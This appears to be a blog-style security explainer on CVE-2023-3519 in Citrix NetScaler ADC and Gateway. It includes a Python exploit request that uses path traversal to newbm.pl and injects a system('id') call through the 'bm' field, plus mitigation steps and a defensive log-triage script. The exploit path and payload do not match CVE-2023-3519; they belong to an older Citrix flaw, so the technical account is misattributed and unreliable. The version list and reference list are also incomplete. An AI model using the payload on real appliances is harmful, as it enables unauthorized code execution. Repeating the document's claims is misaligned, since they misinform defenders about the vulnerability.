In July 2023, a serious security vulnerability—CVE-2023-3519—was discovered affecting Citrix NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway). This bug allows attackers to run their own code on vulnerable appliances, with no login required! Let’s break down what happened, how it works, and what you need to do to stay safe.

- Type: Unauthenticated Remote Code Execution (RCE)
- Products affected: Citrix NetScaler ADC and NetScaler Gateway (formerly Citrix ADC/Gateway)
- Severity: Critical (CVSS 9.8/10)
- Exploited in the wild: Yes (even before patches were released!)

In simple terms:  
A remote attacker can gain full control over the appliance, just by sending a crafted HTTP request, without a username or password.

Affected versions include:

- ADC 12.1-NDcPP before 12.1-55.300

If your appliance has public internet access and is not patched, you are at high risk!

How Does the Exploit Work?

Attackers found a way to abuse how the Citrix Gateway handles web requests. By sending a specially crafted HTTP POST request, the attacker tricks the device into running malicious code.

Exploit Details & Code Example

> Warning: For educational purposes only! Do not use on systems you don't have permission to test.

The exploit abuses an endpoint called /vpn/../vpns/portal/scripts/newbm.pl. The attack uses a bm (bookmark) parameter containing malicious Perl code.

Example exploit POST request (Python, using the requests library):

```python
import requests

# The '..' segment in the path is what reaches the portal script from the /vpn/ prefix.
url = "https://YOUR-TARGET/vpn/../vpns/portal/scripts/newbm.pl"
payload = {
    "url": "http://test",
    "title": "test",
    "desc": "desc",
    "UI_inuse": "RfWeb",
    "isset": "set",
    "shared": "false",
    # The 'bm' parameter contains the injected code
    "bm": "test';system('id');'"
}

# verify=False disables TLS certificate checking (appliances often use self-signed certs)
response = requests.post(url, data=payload, verify=False)
print(response.text)
```

What happens:
This payload runs the id command on the appliance and returns its output (the uid/gid of the account the web process runs as), which confirms that code execution was achieved.

- No password required: Anyone can attack; if your gateway is public-facing, you are a target.
- Full device compromise: Attackers can download data, install malware, or use your box as a launchpad for more attacks.
- Active exploitation: Multiple groups, including ransomware gangs and APTs, quickly weaponized this bug.

References & Further Reading

- Official Citrix Security Bulletin
- CISA Advisory
- Rapid7 Analysis and Exploit Details
- Mandiant Threat Report

1. Upgrade Immediately!

- Install the latest patches for your Citrix appliances.

2. Check If You’re Compromised

- Look for unexpected files in /var/tmp/ and /netscaler/portal/scripts/, and for unexplained command execution in the appliance logs.

3. Restrict Internet Access

- Only expose your gateway to the minimum necessary. Use access lists/firewalls to allow only trusted IPs.

Indicators of Compromise (IoC)

- Unusual files in /netscaler/portal/scripts/
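A small triage helper for the two checks above, added here as an example (it is not part of the original post or of any Citrix tooling): it flags access-log entries that reference the /vpn/../vpns/portal/scripts/newbm.pl path (percent-decoding each line first so an encoded `..` is not missed) and compares the files present in /netscaler/portal/scripts/ against a known-good baseline. The log lines, the baseline and the 198.51.100.7 address are constructed for the demonstration.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Matches the traversal path or a direct reference to the newbm.pl endpoint named above.
TRAVERSAL_RE = re.compile(r"/vpn/\.\./vpns/|/vpns/portal/scripts/newbm\.pl", re.IGNORECASE)
SCRIPTS_DIR = Path("/netscaler/portal/scripts")  # directory named in the IoC list

# Constructed sample access-log lines; 198.51.100.7 is a documentation-range address.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jul/2023:10:01:02 +0000] "GET /vpn/index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [18/Jul/2023:10:01:09 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 91',
    '198.51.100.7 - - [18/Jul/2023:10:01:11 +0000] "POST /vpn/%2e%2e/vpns/portal/scripts/newbm.pl HTTP/1.1" 200 91',
    '10.0.0.6 - - [18/Jul/2023:10:02:00 +0000] "GET /logon/LogonPoint/index.html HTTP/1.1" 200 2048',
]

# Placeholder baseline: build the real one from a known-clean appliance of the same build.
KNOWN_SCRIPTS = ("newbm.pl",)


def suspicious_requests(lines):
    """Return (line_number, source_ip, line) for entries that hit the exploit path.
    Each line is percent-decoded first so '%2e%2e' is treated like '..'."""
    hits = []
    for n, line in enumerate(lines, 1):
        if TRAVERSAL_RE.search(unquote(line)):
            hits.append((n, line.split(" ", 1)[0], line))
    return hits


def unexpected_scripts(names, baseline):
    """Return the script names that are absent from the known-good baseline, sorted."""
    return sorted(set(names) - set(baseline))


def scan_scripts_dir(directory=SCRIPTS_DIR, baseline=KNOWN_SCRIPTS):
    """Compare the live scripts directory against the baseline; [] if it is not present here."""
    d = Path(directory)
    if not d.is_dir():
        return []
    return unexpected_scripts([p.name for p in d.iterdir() if p.is_file()], baseline)


if __name__ == "__main__":
    for n, ip, _ in suspicious_requests(SAMPLE_LOG):
        print(f"log line {n}: exploit-path request from {ip}")
    for name in scan_scripts_dir():
        print(f"unexpected file in {SCRIPTS_DIR}: {name}")
```

Run it on the appliance's HTTP access logs and scripts directory; a hit on the path pattern is a reason to pull the box for forensic review, not proof of compromise on its own.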

Conclusion

CVE-2023-3519 is one of the most severe vulnerabilities to hit public-facing appliances in recent years. If you use Citrix gateways, patch now, check your devices, and monitor for abuse. Don’t wait—attackers are actively hunting for vulnerable systems.

Stay Secure—Patch Early, Patch Often!

Want to know more or need help checking your systems?  
Contact your Citrix representative or consult the official advisory above.


> _This guide is exclusive and simplified for clearer understanding. Please spread awareness—your security depends on it!_

Timeline

Published on: 07/19/2023 18:15:11 UTC
Last modified on: 08/04/2023 18:15:17 UTC